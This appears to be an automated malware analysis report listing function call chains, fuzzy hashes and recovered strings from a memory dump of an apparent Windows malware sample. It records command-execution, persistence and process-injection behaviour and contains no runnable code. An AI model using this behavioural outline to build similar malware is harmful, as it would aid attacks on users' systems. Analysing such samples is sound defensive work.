  • memcpy.NTDLL(00000000,?,?,00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7DF8
  • memcpy.NTDLL(?,?,?,00000000,?,?,00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7E0A
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 62
  • API ID: HeapFree$CloseHandleCreateFileRtlAllocateHeaplstrlenmbstowcs
  • String ID:
  • API String ID: 1841334458-0
  • Opcode ID: 88abf7bf9e6c094b0eee3fb77fa4d18763972b4349be3218ed9dbfc152fe13ca
  • Instruction ID: b1b32dbb2b339a72f492d846fbfcd069bc98c7ba0488c115e2d4a43b7119fad5
  • Opcode Fuzzy Hash: 2BE02B71181D5096C02719A68C58339E6056F422E4E5D4627FA013910FB24317E8EBAB
  • Instruction Fuzzy Hash: b1b32dbb2b339a72f492d846fbfcd069bc98c7ba0488c115e2d4a43b7119fad5
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C7527: LocalFree.KERNEL32(?,?,?,?,00000000,00000000,00000000), ref: 001C75DB
    • Part of subcall function 001C7527: WaitForSingleObject.KERNEL32(00000000,00000000), ref: 001C75FC
  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001C775C
  • lstrlen.KERNEL32(00000000,?,00000000,?,?,001C1255,00000000,00000000,00000004), ref: 001C7774
  • RtlAllocateHeap.NTDLL(00000000,00000002), ref: 001C7788
  • mbstowcs.NTDLL ref: 001C7798
    • Part of subcall function 001C7B90: GetSystemTimeAsFileTime.KERNEL32(001C77AB,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7BAD
    • Part of subcall function 001C7B90: memcpy.NTDLL(001C77AB,?,00000009,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7BCF
    • Part of subcall function 001C7B90: RtlAllocateHeap.NTDLL(00000000,00000013), ref: 001C7BE7
    • Part of subcall function 001C7B90: lstrlenW.KERNEL32(00000000,00000001,001C77AB,?,?,?,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7C07
    • Part of subcall function 001C7B90: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C7C2C
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C77B6
  • CloseHandle.KERNEL32(?), ref: 001C77C0
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C77CF
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 50
  • API ID: CloseHandleCreateThreadGetLastErrorHeapFreeRtlAllocateHeaplstrcpylstrlen
  • String ID:
  • API String ID: 1766977795-0
  • Opcode ID: b41ce86395a358d9a6be2e887350fb16e7ee7d04885f28ea6336c7c9663497fb
  • Instruction ID: 96ec21c43bdbaae9be4f5f8da8c7882276515f35e524364d2f59df83c05b1c59
  • Opcode Fuzzy Hash: A8E026A5068C0583807778228061BAF9B82BAC10D8C8D7123FE402614B2F037487DF2B
  • Instruction Fuzzy Hash: 96ec21c43bdbaae9be4f5f8da8c7882276515f35e524364d2f59df83c05b1c59
APIs
  • lstrlen.KERNEL32(?,00000000,00000000,00000001,?,?,?,001C27D1,001C1F61,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C242D
  • RtlAllocateHeap.NTDLL(00000000,00000009,00000000), ref: 001C2440
  • lstrcpy.KERNEL32(00000008,?), ref: 001C2462
  • CreateThread.KERNEL32(00000000,00000000,001C23CD,00000000,00000000,00000000), ref: 001C247A
  • CloseHandle.KERNEL32(00000000), ref: 001C2485
  • GetLastError.KERNEL32(?,?,?,001C27D1,001C1F61,00000000,00000000,?,?,?,001C4A87,00000000,001EC202,00000000,00000000,00000000), ref: 001C248D
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C249E
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 61
  • API ID: GetCurrentThreadGetCurrentThreadIdRtlAllocateHeaplstrcmplstrlenwsprintf
  • String ID:
  • API String ID: 236900386-0
  • Opcode ID: 0432ee343612a59173c04e27a8b524be30c23a17c6314db2962a76565d5ddb3c
  • Instruction ID: 7b15706a537a474bb122a8de5c1759b17b8367dcae199ddad95220069e92854f
  • Opcode Fuzzy Hash: F7119B31058EC2A7441760C18092BBED450FC920E580D37F2EEB86A2CE6F43258B2B1B
  • Instruction Fuzzy Hash: 7b15706a537a474bb122a8de5c1759b17b8367dcae199ddad95220069e92854f
APIs
    • Part of subcall function 001C45F0: HeapFree.KERNEL32(00000000,?), ref: 001C46AF
    • Part of subcall function 001C45F0: WaitForSingleObject.KERNEL32(00000000), ref: 001C4713
    • Part of subcall function 001C45F0: HeapFree.KERNEL32(00000000,?), ref: 001C473C
    • Part of subcall function 001C45F0: HeapFree.KERNEL32(00000000,00000000), ref: 001C474C
    • Part of subcall function 001C45F0: RegCloseKey.ADVAPI32(?,?,?,00000000,001CB4E0,00000000,00000000,?,001CD6FE), ref: 001C4755
    • Part of subcall function 001D829C: lstrlen.KERNEL32(?,00000000,001EABBC,?,001C194F,?), ref: 001D82A6
    • Part of subcall function 001D829C: StrRChrA.SHLWAPI(?,00000000,0000002E), ref: 001D82D1
    • Part of subcall function 001D829C: lstrcat.KERNEL32(00000000,?), ref: 001D8317
  • lstrcmp.KERNEL32(?,?), ref: 001C4F65
  • GetCurrentThreadId.KERNEL32(?,?,00000000,?,Function_00003E59,?,00000001), ref: 001C5037
  • GetCurrentThread.KERNEL32 ref: 001C5048
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
    • Part of subcall function 001C1916: RegOpenKeyA.ADVAPI32(80000001,?), ref: 001C192A
    • Part of subcall function 001C1916: RegCloseKey.ADVAPI32(?), ref: 001C1958
  • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C50A6
  • wsprintfA.USER32 ref: 001C50B7
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C50C2
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 320
  • API ID: GetLastError$CloseHandleCreateFileSetEndOfFileWriteFile
  • String ID:
  • API String ID: 3756146440-0
  • Opcode ID: 4915370d64bf5c115dcc7df05119504ed8106c73e5c20004021290fc9b098e04
  • Instruction ID: 25e21f08b45b65ae728795522a9e901a714bf6768e996c71cc9bf29c7ae853b0
  • Opcode Fuzzy Hash: A8D0126D078B4ED4D91985A715E2F03E1915F33700E3C460872607926A8B3673AEDF49
  • Instruction Fuzzy Hash: 25e21f08b45b65ae728795522a9e901a714bf6768e996c71cc9bf29c7ae853b0
APIs
  • CreateFileW.KERNEL32(01B37494,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 01B34B26
  • GetLastError.KERNEL32(?,01B32C59,00000000,01B37494,?,00001FD1,00000000,00000000,?,?,01B318C5,?,?), ref: 01B34B33
  • WriteFile.KERNEL32(00000000,?,00001000,01B37494,00000000), ref: 01B34B49
  • SetEndOfFile.KERNEL32(00000000,?,01B32C59,00000000,01B37494,?,00001FD1,00000000,00000000,?,?,01B318C5,?,?), ref: 01B34B54
  • GetLastError.KERNEL32(?,01B32C59,00000000,01B37494,?,00001FD1,00000000,00000000,?,?,01B318C5,?,?), ref: 01B34B5C
  • CloseHandle.KERNEL32(00000000), ref: 01B34B65
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 54
  • API ID: HeapFreeRtlAllocateHeap
  • String ID: https://
  • API String ID: 3817218409-4275131719
  • Opcode ID: f288712f8a6e8bd0bf07739e93ef791456e10643a80339435031cd9f7b6ed460
  • Instruction ID: 0d42b4968aba57015724f328e6a5f9a864d8608e83dd0059b415151ddedf116b
  • Opcode Fuzzy Hash: 18F08B601A85C2A6802718C294AC7B2C604BE80AC0D8D536FFF503929E5FA770D5BB0A
  • Instruction Fuzzy Hash: 0d42b4968aba57015724f328e6a5f9a864d8608e83dd0059b415151ddedf116b
APIs
    • Part of subcall function 001C5ADD: GetSystemTimeAsFileTime.KERNEL32(?), ref: 001C5AEB
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C83ED
  • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C843C
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6E41
    • Part of subcall function 001D6DF6: WaitForSingleObject.KERNEL32(000000C8), ref: 001D6E66
    • Part of subcall function 001D6DF6: SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 001D6EAF
    • Part of subcall function 001D6DF6: WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 001D6EC4
    • Part of subcall function 001D6DF6: SetEndOfFile.KERNEL32(00000006), ref: 001D6ED1
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6EDD
    • Part of subcall function 001D6DF6: CloseHandle.KERNEL32(00000006), ref: 001D6EE9
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C8471
  • HeapFree.KERNEL32(00000000,?), ref: 001C8481
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 53
  • API ID: HeapFreeRegCloseKeyRegOpenKeyRtlAllocateHeap
  • String ID: Main
  • API String ID: 1238789381-521822810
  • Opcode ID: 430bf3c3e099aaf98ba0d13378e5d8da2de179d3274a2f5d09db6df723472999
  • Instruction ID: 8f29cc0f23f969ede819062a95f7fcd74d74c9a74bdfea75fafa15d21f68d3cc
  • Opcode Fuzzy Hash: CAE026B00A45C5AA403B7C81647B2F29410F9A08C20CD976BEE009F28CAE4670A27B9A
  • Instruction Fuzzy Hash: 8f29cc0f23f969ede819062a95f7fcd74d74c9a74bdfea75fafa15d21f68d3cc
APIs
  • RegOpenKeyA.ADVAPI32(80000001,?), ref: 001C4220
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C4256
  • HeapFree.KERNEL32(00000000,?), ref: 001C428F
  • RegCloseKey.ADVAPI32(?), ref: 001C4298
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 45
  • API ID: CreateDirectoryHeapFreeRtlAllocateHeaplstrlen
  • String ID: %APPDATA%\Microsoft\
  • API String ID: 3959905781-2699254172
  • Opcode ID: a91e168cb75582dc69dc678417b6008db4073c04297a41e19573c560bdc487dc
  • Instruction ID: cffe0b6492667c1a66e0568daab83b9343bd146d6441e28ba88ab90f7e1d944e
  • Opcode Fuzzy Hash: 10D05EB0444802AB953BA426806A739884A7F823D0C5E7536E9404A26FBB9362956E6A
  • Instruction Fuzzy Hash: cffe0b6492667c1a66e0568daab83b9343bd146d6441e28ba88ab90f7e1d944e
APIs
  • RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C29D8
    • Part of subcall function 001D6CC6: lstrlen.KERNEL32(?,?,00000000,?,00000000,001C7543,?,?,?,?,?,?,?,?,?,001C1255), ref: 001D6CD5
  • CreateDirectoryW.KERNEL32(00000000,00000000,?,?,001C2A7A,00000000), ref: 001C2A06
  • lstrlenW.KERNEL32(00000000,?,?,001C2A7A,00000000), ref: 001C2A12
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C2A2A
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: lstrlen$RtlAllocateHeap
  • String ID: [FILE]$DllRegisterServer
  • API String ID: 2544908171-3029713317
  • Opcode ID: 2d4b95e8c34fd7eb35c32aaba08f5fcf9921a6e8c8be63207aa385bfa2f516c2
  • Instruction ID: 5cabe30f11294075a22546247cc9a04f0ebb488a8614786e1935660b83a97d3e
  • Opcode Fuzzy Hash: 73C012709914038B04177926842423CC68A39957E540E0619E8473611A5B0302CD5A1E
  • Instruction Fuzzy Hash: 5cabe30f11294075a22546247cc9a04f0ebb488a8614786e1935660b83a97d3e
APIs
  • lstrlenW.KERNEL32(00000000,00000000,00000000,.dll,001C2B1B,00000000,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001D9EB8
  • lstrlen.KERNEL32(DllRegisterServer), ref: 001D9EC6
  • RtlAllocateHeap.NTDLL(00000000,00000022), ref: 001D9EDB
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: HeapFreememcpy$RtlAllocateHeap
  • String ID:
  • API String ID: 1281497405-0
  • Opcode ID: c91cc279de764e5f2579d6076ec579c7e1ff7f10485d5d5ea4a8a547ad6caca9
  • Instruction ID: 3ae8df9311abcb48d6f96013da2b6f76f4bc533e0507b6b7ad3ca337a4177261
  • Opcode Fuzzy Hash: D1014E13C804C3878807342E9024AB8C449BE822C0DCDD316AA081C13F8BA232B7764F
  • Instruction Fuzzy Hash: 3ae8df9311abcb48d6f96013da2b6f76f4bc533e0507b6b7ad3ca337a4177261
APIs
    • Part of subcall function 001C8692: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C86CC
  • RtlAllocateHeap.NTDLL(00000000,001E5065,?), ref: 001C8BEE
  • memcpy.NTDLL(00000000,00000000,00000000), ref: 001C8C05
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C8C18
  • memcpy.NTDLL(00000000,?,?), ref: 001C8C27
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C8C8B
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
    • Part of subcall function 001DAA89: RtlLeaveCriticalSection.NTDLL(?), ref: 001DAB06
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: HeapFree$RegCloseKeyWaitForSingleObject
  • String ID:
  • API String ID: 3052965740-0
  • Opcode ID: d3c070adaf0f083c3fd626d879ba680c8654bd575e600ed9f9379d1952a7449c
  • Instruction ID: ae659000fd8a6ff0622346f66fb9775bf8617b043a7e92e8c3d009521b2ea922
  • Opcode Fuzzy Hash: 1B01F521055AD313C12BA88192BA3FA8505BF829E1D4D1737FEB81E18C5F4721E6A707
  • Instruction Fuzzy Hash: ae659000fd8a6ff0622346f66fb9775bf8617b043a7e92e8c3d009521b2ea922
APIs
    • Part of subcall function 001C3BF0: RegCreateKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C05
    • Part of subcall function 001C3BF0: RegOpenKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C12
    • Part of subcall function 001C3BF0: lstrlen.KERNEL32(001EB004,00000000,00000000,00000000,?,?,?,001C3C71,00000000,00000000,00000000,00000001,?,?,?,001C4C86), ref: 001C3C33
  • HeapFree.KERNEL32(00000000,?), ref: 001C46AF
  • WaitForSingleObject.KERNEL32(00000000), ref: 001C4713
  • HeapFree.KERNEL32(00000000,?), ref: 001C473C
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C474C
  • RegCloseKey.ADVAPI32(?,?,?,00000000,001CB4E0,00000000,00000000,?,001CD6FE), ref: 001C4755
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: HeapFree$RtlAllocateHeaplstrlenwsprintf
  • String ID:
  • API String ID: 4063120414-0
  • Opcode ID: 82a566ac4b7e44f40389d82a26e71ca4d0b382ca24f9de814279e5df00d9b999
  • Instruction ID: ea15a0fccfaea50bf9a426a543ac3d3c6aed45562802de59e2cba04bd230a37d
  • Opcode Fuzzy Hash: 10F0F4A4112C418A8C56A6F1989CB7852C85B925FDD4E3313A76C314EB3B13335EBE4D
  • Instruction Fuzzy Hash: ea15a0fccfaea50bf9a426a543ac3d3c6aed45562802de59e2cba04bd230a37d
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C77DE: RtlAllocateHeap.NTDLL(00000000,00000020), ref: 001C7804
    • Part of subcall function 001C77DE: HeapFree.KERNEL32(00000000,?,00000000), ref: 001C7868
  • lstrlen.KERNEL32(00000000,001ECDBE,00000000,001ECDAC,00000000,001ECD98,00000000,001ECE3B,00000000,001ECE30,00000000,001ECD88,00000000,00002334), ref: 001C792A
  • RtlAllocateHeap.NTDLL(00000000,-0000000C), ref: 001C793F
  • wsprintfA.USER32 ref: 001C7954
    • Part of subcall function 001C7422: memset.NTDLL ref: 001C743A
    • Part of subcall function 001C7422: lstrlenW.KERNEL32(00000000,00000000,00000000,001EAD10,00000000,cmd /C "%s> %s1"), ref: 001C7473
    • Part of subcall function 001C7422: wcstombs.NTDLL ref: 001C747D
    • Part of subcall function 001C7422: CreateProcessA.KERNEL32(00000000,001C7831,00000000,00000000,00000000,0C000000,00000000,?,00000044,?), ref: 001C74B1
    • Part of subcall function 001C7422: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C74D2
    • Part of subcall function 001C7422: GetExitCodeProcess.KERNEL32(?,?), ref: 001C74EF
    • Part of subcall function 001C7422: GetLastError.KERNEL32 ref: 001C7507
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C796E
    • Part of subcall function 001C7664: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C76B4
    • Part of subcall function 001C7664: GetLastError.KERNEL32(?,00000000,001C797E), ref: 001C76E5
    • Part of subcall function 001C7664: HeapFree.KERNEL32(00000000,00000000), ref: 001C76F7
    • Part of subcall function 001C7664: HeapFree.KERNEL32(00000000,001C797E), ref: 001C770C
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C7998
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: CreateWaitableTimerGetLastErrorGetSystemTimeAsFileTimeHeapFreeOpenWaitableTimer
  • String ID:
  • API String ID: 1165046961-0
  • Opcode ID: dcf0f1391520f43fe6097fd0f752f71d1dc6f160b6cfea933156b7ea3217ac6e
  • Instruction ID: 47380e5463a91fa5f58a51e79f45711cdea6db2302c913f91e1116e2b5f0794b
  • Opcode Fuzzy Hash: 3BF02BA00A858783E07B64608177BB58300EBC25D5D8C2733F65D5DB5D8F46B1A2FA25
  • Instruction Fuzzy Hash: 47380e5463a91fa5f58a51e79f45711cdea6db2302c913f91e1116e2b5f0794b
APIs
  • OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 001C43B2
  • CreateWaitableTimerA.KERNEL32(001EB0D8,?,?), ref: 001C43D1
  • GetLastError.KERNEL32 ref: 001C43E1
    • Part of subcall function 001C3C55: RegQueryValueExA.KERNEL32(00000000,001CD4DC,00000000,001CD4DC,00000000,?,00000000,00000000,00000000,00000000,00000001,?,?,?,001C4C86,001EC1F9), ref: 001C3C8D
    • Part of subcall function 001C3C55: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C3CA1
    • Part of subcall function 001C3C55: HeapFree.KERNEL32(00000000,?), ref: 001C3CD7
    • Part of subcall function 001C3C55: RegCloseKey.ADVAPI32(00000000,?,?,?,001C4C86,001EC1F9,001CD4DC,00000000,00000000,00000000,00000001,?,?,?,001CD4DC,00000000), ref: 001C3CE5
  • GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000002,?), ref: 001C4428
  • HeapFree.KERNEL32(00000000,00000002,00000000), ref: 001C445C
    • Part of subcall function 001C4349: GetSystemTimeAsFileTime.KERNEL32(?), ref: 001C4356
    • Part of subcall function 001C4349: SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000), ref: 001C4390
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 59
  • API ID: HeapFreeRtlAllocateHeaplstrcpylstrcpynlstrlen
  • String ID:
  • API String ID: 2577868549-0
  • Opcode ID: 1d80e047f999f10d401b9f46cfff4084342c566a149a0ba19b39b0a0f7985056
  • Instruction ID: 2369ec942959bcc0f81c5e1f9b71a5b6904734b35236ac73d6e48e3a05a83d19
  • Opcode Fuzzy Hash: C6F08B2B448E429BC027204202A67D8E71CBB818DAC4D8B319884795AE2EC272225B0A
  • Instruction Fuzzy Hash: 2369ec942959bcc0f81c5e1f9b71a5b6904734b35236ac73d6e48e3a05a83d19
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000007), ref: 001C9F8D
  • lstrcpy.KERNEL32(00000000,001EC424), ref: 001C9F9F
  • lstrcpyn.KERNEL32(00000006,?,00000001,?,?,?,?,?,00000000,00000000,?), ref: 001C9FAC
  • lstrlen.KERNEL32(001EC424,?,?,?,?,?,00000000,00000000,?), ref: 001C9FBE
    • Part of subcall function 001CA73F: RtlAllocateHeap.NTDLL(00000000,-00000005), ref: 001CA760
    • Part of subcall function 001CA73F: wsprintfA.USER32 ref: 001CA775
    • Part of subcall function 001CA73F: RegCreateKeyA.ADVAPI32(80000001,001EB240,00000000), ref: 001CA78D
    • Part of subcall function 001CA73F: RegCloseKey.ADVAPI32(?), ref: 001CA7B5
    • Part of subcall function 001CA73F: HeapFree.KERNEL32(00000000,00000000), ref: 001CA7C4
    • Part of subcall function 001CAF14: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CAF93
    • Part of subcall function 001CAF14: wsprintfA.USER32 ref: 001CB04B
    • Part of subcall function 001CAF14: memcpy.NTDLL(00000000,?,?), ref: 001CB090
    • Part of subcall function 001CAF14: InterlockedExchange.KERNEL32(001EAFEC,00000000), ref: 001CB0AE
    • Part of subcall function 001CAF14: HeapFree.KERNEL32(00000000,00000000), ref: 001CB0F1
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C9FEF
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 117
  • API ID: GetLastError$CloseHandleReleaseMutexWaitForMultipleObjects
  • String ID:
  • API String ID: 981764843-0
  • Opcode ID: e0028ebea731b05e1f81d164d1b0c22b432d0313b7510209d972350b2e9e1cbf
  • Instruction ID: 983f2bdd78a01378a5524cb3713f7215791f28ca6a77dfb9313747591b0c8092
  • Opcode Fuzzy Hash: 63F06276110C810BCE276554A46279A5A106FC23F048C1753FFF66A1EF1B527AD21B8A
  • Instruction Fuzzy Hash: 983f2bdd78a01378a5524cb3713f7215791f28ca6a77dfb9313747591b0c8092
APIs
    • Part of subcall function 001C44A4: OpenMutexA.KERNEL32(00100001,00000000,?), ref: 001C44B0
    • Part of subcall function 001C44A4: SetLastError.KERNEL32(000000B7,?,001C44F5), ref: 001C44C1
    • Part of subcall function 001C44A4: CreateMutexA.KERNEL32(001EB0D8,00000000,?,?,001C44F5), ref: 001C44D4
  • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C4515
  • CloseHandle.KERNEL32(00000000), ref: 001C45D3
    • Part of subcall function 001C439B: OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 001C43B2
    • Part of subcall function 001C439B: CreateWaitableTimerA.KERNEL32(001EB0D8,?,?), ref: 001C43D1
    • Part of subcall function 001C439B: GetLastError.KERNEL32 ref: 001C43E1
    • Part of subcall function 001C439B: GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000002,?), ref: 001C4428
    • Part of subcall function 001C439B: HeapFree.KERNEL32(00000000,00000002,00000000), ref: 001C445C
  • GetLastError.KERNEL32 ref: 001C45BC
  • ReleaseMutex.KERNEL32(00000000), ref: 001C45C5
  • GetLastError.KERNEL32 ref: 001C45E0
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: memcpy$HeapFreeRtlAllocateHeaplstrcmpi
  • String ID:
  • API String ID: 857938089-0
  • Opcode ID: 4b4a78c487d6048ee3f3895cdad3a98188a4a88c0ba2f47e4ae26dadc0163ad9
  • Instruction ID: 3f52a085e5dd49b5850e34594fd6f7df3e0d62c374d676f882949c6103c053a0
  • Opcode Fuzzy Hash: C5F09E214D05C251D61B10B45894B94E946FE823B3C8DA7379C047908B2A4221A9B5EF
  • Instruction Fuzzy Hash: 3f52a085e5dd49b5850e34594fd6f7df3e0d62c374d676f882949c6103c053a0
APIs
    • Part of subcall function 001C57CC: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C57D4
    • Part of subcall function 001C57CC: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C57E9
    • Part of subcall function 001C57CC: InterlockedIncrement.KERNEL32(0000001C), ref: 001C5802
  • RtlAllocateHeap.NTDLL(00000000,?,001ED278), ref: 001CADC5
  • memcpy.NTDLL(00000000,?,?), ref: 001CADD6
    • Part of subcall function 001C5761: InterlockedDecrement.KERNEL32(0000001C), ref: 001C5765
  • lstrcmpi.KERNEL32(00000002,?), ref: 001CAE1C
  • memcpy.NTDLL(00000000,?,?), ref: 001CAE30
  • HeapFree.KERNEL32(00000000,00000000,001ED278), ref: 001CAE6F
    • Part of subcall function 001C7AF2: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 001C7B06
    • Part of subcall function 001C7AF2: memcpy.NTDLL(00000000,001C7C21,?,?,00000008,?,001C7C21,00000000,00000000,?), ref: 001C7B2F
    • Part of subcall function 001C7AF2: RegCloseKey.ADVAPI32(?,?,001C7C21,00000000,00000000,?,?,?,?,?,?,?,?,00000008,001C77AB,00000000), ref: 001C7B81
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 95
  • API ID: CloseHandleGetLastError$OpenProcess
  • String ID:
  • API String ID: 3618605412-0
  • Opcode ID: f3c28a13a8270d655170a0e3c90d88c5c03aaf1802dd5309b87f7072ec2badc3
  • Instruction ID: ee927bb26a947277b8e3b3d91228e1c9832b26c7ffbdb67feee30960427366c3
  • Opcode Fuzzy Hash: 13F09E78181666838027B06098507FBF645FE821CF6AC3610F6603108A47563AD76754
  • Instruction Fuzzy Hash: ee927bb26a947277b8e3b3d91228e1c9832b26c7ffbdb67feee30960427366c3
APIs
    • Part of subcall function 001D8325: GetModuleHandleA.KERNEL32(001EC01D,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D833F
    • Part of subcall function 001D8325: GetProcAddress.KERNEL32(00000000,001EDA66,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D8350
    • Part of subcall function 001D8325: OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D836D
    • Part of subcall function 001D8325: IsWow64Process.KERNELBASE(00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D837E
    • Part of subcall function 001D8325: CloseHandle.KERNEL32(00000000), ref: 001D8391
